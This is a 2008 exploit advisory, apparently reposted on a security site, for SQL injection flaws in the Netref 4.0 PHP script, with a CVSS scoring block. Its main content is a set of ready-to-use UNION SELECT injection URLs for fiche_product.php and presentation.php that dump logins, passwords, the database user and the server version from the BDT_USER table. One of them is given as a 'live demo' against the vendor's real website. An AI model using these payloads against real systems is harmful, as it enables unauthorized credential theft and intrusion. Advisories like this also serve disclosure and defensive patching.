Netref 4.0 Multiple Remote SQL Injection Vulnerabilities

2008.12.17
Credit: SuB-ZeRo
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############### SuB-ZeRo ############### ############### Dz-hackers ################# Netref 4.0 Remote SQL Injection Vulnerability ----------------------------------------------------------------------------------------------------------- [+]Discovred by : SuB-ZeRo [+]Vendor URL : www.netref.net [+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627 [+]home: www.sub-z3ro.com / www.h4ck3r-dz.com [+]ConTacTe: FbH@hotmail.com [+]DoRk: FiNd It (SoOrY) [+]exploit: [+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- [+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- [+]l!ve demo: [+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- ---------------------------------------------------------------------------------------------------------------------- [+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme ---------------------------------------------------------------------------------------------------------------------- sub-z3ro.com sOoN


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top